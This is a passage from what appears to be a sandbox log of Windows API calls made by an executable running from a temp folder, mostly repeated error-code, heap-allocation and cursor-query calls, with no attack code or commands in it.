"c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe")) returned 0x2d [0136.197] GetLastError () returned 0x0 [0136.197] SetLastError (dwErrCode=0x0) [0136.197] GetLastError () returned 0x0 [0136.197] SetLastError (dwErrCode=0x0) [0136.197] GetLastError () returned 0x0 [0136.197] SetLastError (dwErrCode=0x0) [0136.197] GetLastError () returned 0x0 [0136.197] SetLastError (dwErrCode=0x0) [0136.197] GetLastError () returned 0x0 [0136.197] SetLastError (dwErrCode=0x0) [0136.231] GetLastError () returned 0x0 [0136.231] SetLastError (dwErrCode=0x0) [0136.231] GetLastError () returned 0x0 [0136.232] SetLastError (dwErrCode=0x0) [0136.232] GetLastError () returned 0x0 [0136.232] SetLastError (dwErrCode=0x0) [0136.232] GetLastError () returned 0x0 [0136.232] SetLastError (dwErrCode=0x0) [0136.232] GetLastError () returned 0x0 [0136.232] SetLastError (dwErrCode=0x0) [0136.232] GetLastError () returned 0x0 [0136.232] SetLastError (dwErrCode=0x0) [0136.232] GetLastError () returned 0x0 [0136.232] SetLastError (dwErrCode=0x0) [0136.232] GetLastError () returned 0x0 [0136.232] SetLastError (dwErrCode=0x0) [0136.232] GetLastError () returned 0x0 [0136.232] SetLastError (dwErrCode=0x0) [0136.232] GetLastError () returned 0x0 [0136.232] SetLastError (dwErrCode=0x0) [0136.232] GetLastError () returned 0x0 [0136.232] SetLastError (dwErrCode=0x0) [0136.232] GetLastError () returned 0x0 [0136.233] SetLastError (dwErrCode=0x0) [0136.233] GetLastError () returned 0x0 [0136.233] SetLastError (dwErrCode=0x0) [0136.233] GetLastError () returned 0x0 [0136.233] SetLastError (dwErrCode=0x0) [0136.233] GetLastError () returned 0x0 [0136.233] SetLastError (dwErrCode=0x0) [0136.233] GetLastError () returned 0x0 [0136.233] SetLastError (dwErrCode=0x0) [0136.233] GetLastError () returned 0x0 [0136.233] SetLastError (dwErrCode=0x0) [0136.233] GetLastError () returned 0x0 [0136.233] SetLastError (dwErrCode=0x0) [0136.233] GetLastError () returned 0x0 [0136.233] SetLastError (dwErrCode=0x0) [0136.233] GetLastError () returned 0x0 [0136.233] SetLastError (dwErrCode=0x0) [0136.233] GetLastError () returned 0x0 [0136.233] SetLastError (dwErrCode=0x0) [0136.233] GetLastError () returned 0x0 [0136.234] SetLastError (dwErrCode=0x0) [0136.234] GetLastError () returned 0x0 [0136.234] SetLastError (dwErrCode=0x0) [0136.234] GetLastError () returned 0x0 [0136.234] SetLastError (dwErrCode=0x0) [0136.234] GetLastError () returned 0x0 [0136.234] SetLastError (dwErrCode=0x0) [0136.234] GetLastError () returned 0x0 [0136.234] SetLastError (dwErrCode=0x0) [0136.234] GetLastError () returned 0x0 [0136.234] SetLastError (dwErrCode=0x0) [0136.234] GetLastError () returned 0x0 [0136.234] SetLastError (dwErrCode=0x0) [0136.234] GetLastError () returned 0x0 [0136.234] SetLastError (dwErrCode=0x0) [0136.234] GetLastError () returned 0x0 [0136.234] SetLastError (dwErrCode=0x0) [0136.234] GetLastError () returned 0x0 [0136.234] SetLastError (dwErrCode=0x0) [0136.234] GetLastError () returned 0x0 [0136.235] SetLastError (dwErrCode=0x0) [0136.235] GetLastError () returned 0x0 [0136.235] SetLastError (dwErrCode=0x0) [0136.235] GetLastError () returned 0x0 [0136.235] SetLastError (dwErrCode=0x0) [0136.235] GetLastError () returned 0x0 [0136.235] SetLastError (dwErrCode=0x0) [0136.235] GetLastError () returned 0x0 [0136.235] SetLastError (dwErrCode=0x0) [0136.235] GetLastError () returned 0x0 [0136.235] SetLastError (dwErrCode=0x0) [0136.235] GetLastError () returned 0x0 [0136.235] SetLastError (dwErrCode=0x0) [0136.235] GetLastError () returned 0x0 [0136.235] SetLastError (dwErrCode=0x0) [0136.235] GetLastError () returned 0x0 [0136.235] SetLastError (dwErrCode=0x0) [0136.235] GetLastError () returned 0x0 [0136.236] SetLastError (dwErrCode=0x0) [0136.236] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x5a) returned 0x2131818 [0136.236] GetLastError () returned 0x0 [0136.236] SetLastError (dwErrCode=0x0) [0136.236] GetLastError () returned 0x0 [0136.236] SetLastError (dwErrCode=0x0) [0136.236] GetLastError () returned 0x0 [0136.236] SetLastError (dwErrCode=0x0) [0136.236] GetLastError () returned 0x0 [0136.236] SetLastError (dwErrCode=0x0) [0136.236] GetLastError () returned 0x0 [0136.236] SetLastError (dwErrCode=0x0) [0136.236] GetLastError () returned 0x0 [0136.236] SetLastError (dwErrCode=0x0) [0136.236] GetLastError () returned 0x0 [0136.236] SetLastError (dwErrCode=0x0) [0136.236] GetLastError () returned 0x0 [0136.237] SetLastError (dwErrCode=0x0) [0136.237] GetLastError () returned 0x0 [0136.237] SetLastError (dwErrCode=0x0) [0136.237] GetLastError () returned 0x0 [0136.237] SetLastError (dwErrCode=0x0) [0136.237] GetLastError () returned 0x0 [0136.237] SetLastError (dwErrCode=0x0) [0136.237] GetLastError () returned 0x0 [0136.237] SetLastError (dwErrCode=0x0) [0136.237] GetLastError () returned 0x0 [0136.237] SetLastError (dwErrCode=0x0) [0136.237] GetLastError () returned 0x0 [0136.237] SetLastError (dwErrCode=0x0) [0136.237] GetLastError () returned 0x0 [0136.237] SetLastError (dwErrCode=0x0) [0136.237] GetLastError () returned 0x0 [0136.237] SetLastError (dwErrCode=0x0) [0136.237] GetLastError () returned 0x0 [0136.238] SetLastError (dwErrCode=0x0) [0136.238] GetLastError () returned 0x0 [0136.238] SetLastError (dwErrCode=0x0) [0136.238] GetLastError () returned 0x0 [0136.238] SetLastError (dwErrCode=0x0) [0136.238] GetLastError () returned 0x0 [0136.238] SetLastError (dwErrCode=0x0) [0136.238] GetLastError () returned 0x0 [0136.238] SetLastError (dwErrCode=0x0) [0136.238] GetLastError () returned 0x0 [0136.238] SetLastError (dwErrCode=0x0) [0136.238] GetLastError () returned 0x0 [0136.238] SetLastError (dwErrCode=0x0) [0136.238] GetLastError () returned 0x0 [0136.238] SetLastError (dwErrCode=0x0) [0136.238] GetLastError () returned 0x0 [0136.238] SetLastError (dwErrCode=0x0) [0136.238] GetLastError () returned 0x0 [0136.239] SetLastError (dwErrCode=0x0) [0136.239] GetLastError () returned 0x0 [0136.239] SetLastError (dwErrCode=0x0) [0136.239] GetLastError () returned 0x0 [0136.239] SetLastError (dwErrCode=0x0) [0136.239] GetLastError () returned 0x0 [0136.239] SetLastError (dwErrCode=0x0) [0136.239] GetLastError () returned 0x0 [0136.239] SetLastError (dwErrCode=0x0) [0136.239] GetLastError () returned 0x0 [0136.239] SetLastError (dwErrCode=0x0) [0136.239] GetLastError () returned 0x0 [0136.239] SetLastError (dwErrCode=0x0) [0136.239] GetLastError () returned 0x0 [0136.239] SetLastError (dwErrCode=0x0) [0136.239] GetLastError () returned 0x0 [0136.239] SetLastError (dwErrCode=0x0) [0136.239] GetLastError () returned 0x0 [0136.240] SetLastError (dwErrCode=0x0) [0136.240] GetLastError () returned 0x0 [0136.240] SetLastError (dwErrCode=0x0) [0136.240] GetLastError () returned 0x0 [0136.240] SetLastError (dwErrCode=0x0) [0136.240] GetLastError () returned 0x0 [0136.240] SetLastError (dwErrCode=0x0) [0136.240] GetLastError () returned 0x0 [0136.240] SetLastError (dwErrCode=0x0) [0136.240] GetLastError () returned 0x0 [0136.240] SetLastError (dwErrCode=0x0) [0136.240] GetLastError () returned 0x0 [0136.240] SetLastError (dwErrCode=0x0) [0136.240] GetLastError () returned 0x0 [0136.240] SetLastError (dwErrCode=0x0) [0136.240] GetLastError () returned 0x0 [0136.240] SetLastError (dwErrCode=0x0) [0136.240] GetLastError () returned 0x0 [0136.241] SetLastError (dwErrCode=0x0) [0136.241] GetLastError () returned 0x0 [0136.241] SetLastError (dwErrCode=0x0) [0136.241] GetLastError () returned 0x0 [0136.241] SetLastError (dwErrCode=0x0) [0136.241] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0xc0) returned 0x2131880 [0136.241] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x43) returned 0x2131948 [0136.241] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x52) returned 0x2131998 [0136.241] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x5b) returned 0x21319f8 [0136.241] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x60) returned 0x2131a60 [0136.241] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x55) returned 0x2131ac8 [0136.241] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x38) returned 0x2131b28 [0136.241] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x48) returned 0x2131b68 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x55) returned 0x2131bb8 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x4c) returned 0x2131c18 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x31) returned 0x2131c70 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x41) returned 0x2131cb0 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x55) returned 0x2131d00 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x39) returned 0x2131d60 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x3b) returned 0x2131da8 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x32) returned 0x2131df0 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x8d) returned 0x2131e30 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x62) returned 0x2131ec8 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x3f) returned 0x2131f38 [0136.242] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x41) returned 0x2131f80 [0136.243] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x6c) returned 0x2131fd0 [0136.243] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x36) returned 0x2132048 [0136.243] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x3c) returned 0x2132088 [0136.243] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x3f) returned 0x21320d0 [0136.243] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x48) returned 0x2132118 [0136.243] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x4d) returned 0x2132168 [0136.243] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x42) returned 0x21321c0 [0136.243] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x8f) returned 0x2132210 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x3b) returned 0x21322a8 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x38) returned 0x21322f0 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x33) returned 0x2132330 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x3a) returned 0x2132370 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x4e) returned 0x21323b8 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x4d) returned 0x2132410 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x36) returned 0x2132468 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x45) returned 0x21324a8 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x3a) returned 0x21324f8 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x46) returned 0x2132540 [0136.244] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x36) returned 0x2132590 [0136.248] HeapValidate (hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131018) returned 1 [0136.248] HeapFree (in: hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131018 | out: hHeap=0x2130000) returned 1 [0136.248] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76720000 [0136.248] GetProcAddress (hModule=0x76720000, lpProcName="IsProcessorFeaturePresent") returned 0x76739bf0 [0136.248] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0136.250] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0xa4) returned 0x2131018 [0136.250] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x824) returned 0x21325d0 [0136.250] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x415a00) returned 0x0 [0136.251] HeapValidate (hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131018) returned 1 [0136.251] HeapValidate (hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131018) returned 1 [0136.252] GetLastError () returned 0x0 [0136.252] SetLastError (dwErrCode=0x0) [0136.252] GetLastError () returned 0x0 [0136.252] SetLastError (dwErrCode=0x0) [0136.252] GetLastError () returned 0x0 [0136.252] SetLastError (dwErrCode=0x0) [0136.252] GetLastError () returned 0x0 [0136.252] SetLastError (dwErrCode=0x0) [0136.252] GetLastError () returned 0x0 [0136.252] SetLastError (dwErrCode=0x0) [0136.252] GetLastError () returned 0x0 [0136.252] SetLastError (dwErrCode=0x0) [0136.252] GetLastError () returned 0x0 [0136.252] SetLastError (dwErrCode=0x0) [0136.253] GetLastError () returned 0x0 [0136.253] SetLastError (dwErrCode=0x0) [0136.253] GetLastError () returned 0x0 [0136.253] SetLastError (dwErrCode=0x0) [0136.253] GetLastError () returned 0x0 [0136.253] SetLastError (dwErrCode=0x0) [0136.253] GetLastError () returned 0x0 [0136.253] SetLastError (dwErrCode=0x0) [0136.253] GetLastError () returned 0x0 [0136.253] SetLastError (dwErrCode=0x0) [0136.253] GetLastError () returned 0x0 [0136.253] SetLastError (dwErrCode=0x0) [0136.253] GetLastError () returned 0x0 [0136.253] SetLastError (dwErrCode=0x0) [0136.253] GetLastError () returned 0x0 [0136.253] SetLastError (dwErrCode=0x0) [0136.253] GetLastError () returned 0x0 [0136.254] SetLastError (dwErrCode=0x0) [0136.254] GetLastError () returned 0x0 [0136.254] SetLastError (dwErrCode=0x0) [0136.254] GetLastError () returned 0x0 [0136.254] SetLastError (dwErrCode=0x0) [0136.254] GetLastError () returned 0x0 [0136.254] SetLastError (dwErrCode=0x0) [0136.254] GetLastError () returned 0x0 [0136.254] SetLastError (dwErrCode=0x0) [0136.254] GetLastError () returned 0x0 [0136.254] SetLastError (dwErrCode=0x0) [0136.254] GetLastError () returned 0x0 [0136.254] SetLastError (dwErrCode=0x0) [0136.254] GetLastError () returned 0x0 [0136.254] SetLastError (dwErrCode=0x0) [0136.254] GetLastError () returned 0x0 [0136.254] SetLastError (dwErrCode=0x0) [0136.254] GetLastError () returned 0x0 [0136.255] SetLastError (dwErrCode=0x0) [0136.255] GetLastError () returned 0x0 [0136.255] SetLastError (dwErrCode=0x0) [0136.255] GetLastError () returned 0x0 [0136.255] SetLastError (dwErrCode=0x0) [0136.255] GetLastError () returned 0x0 [0136.255] SetLastError (dwErrCode=0x0) [0136.255] GetLastError () returned 0x0 [0136.255] SetLastError (dwErrCode=0x0) [0136.255] GetLastError () returned 0x0 [0136.255] SetLastError (dwErrCode=0x0) [0136.255] GetLastError () returned 0x0 [0136.255] SetLastError (dwErrCode=0x0) [0136.255] GetLastError () returned 0x0 [0136.255] SetLastError (dwErrCode=0x0) [0136.255] GetLastError () returned 0x0 [0136.255] SetLastError (dwErrCode=0x0) [0136.255] GetLastError () returned 0x0 [0136.256] SetLastError (dwErrCode=0x0) [0136.256] GetLastError () returned 0x0 [0136.256] SetLastError (dwErrCode=0x0) [0136.256] GetLastError () returned 0x0 [0136.256] SetLastError (dwErrCode=0x0) [0136.256] GetLastError () returned 0x0 [0136.256] SetLastError (dwErrCode=0x0) [0136.256] GetLastError () returned 0x0 [0136.257] SetLastError (dwErrCode=0x0) [0136.257] GetLastError () returned 0x0 [0136.257] SetLastError (dwErrCode=0x0) [0136.257] GetLastError () returned 0x0 [0136.257] SetLastError (dwErrCode=0x0) [0136.257] GetLastError () returned 0x0 [0136.257] SetLastError (dwErrCode=0x0) [0136.257] GetLastError () returned 0x0 [0136.257] SetLastError (dwErrCode=0x0) [0136.257] GetLastError () returned 0x0 [0136.257] SetLastError (dwErrCode=0x0) [0136.257] GetLastError () returned 0x0 [0136.257] SetLastError (dwErrCode=0x0) [0136.257] GetLastError () returned 0x0 [0136.257] SetLastError (dwErrCode=0x0) [0136.257] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.262] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.263] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.263] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.263] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.263] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.263] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.263] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.263] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.263] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.263] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.264] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.264] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.264] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.264] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.264] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.264] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.264] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.264] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.264] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.264] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.264] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.264] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.264] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.264] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.264] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.265] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.265] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.265] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.265] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.265] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.265] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.265] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.265] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.265] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.265] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.265] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.265] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.265] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.265] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.265] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.266] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.266] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.266] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.266] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.266] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.266] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.266] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.266] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.266] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.266] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.266] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.266] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.266] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.266] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.266] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.267] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.267] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.267] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.267] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.267] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.267] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.267] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.267] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.267] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.267] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.267] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.267] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.267] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.267] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.267] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.268] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.268] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.268] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.268] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.268] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.268] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.268] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.268] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.268] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.268] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.271] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.271] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.271] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.271] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.272] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.272] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.272] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.272] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.272] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.272] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.272] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.272] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.272] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.272] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.272] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.272] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.272] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.272] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.273] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.273] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.273] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.273] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.273] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.273] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.273] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.273] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.273] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.273] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.273] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.273] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.273] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.273] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.273] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.273] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.274] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.274] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.274] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.274] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.274] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.274] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.274] CharToOemBuffW (in: 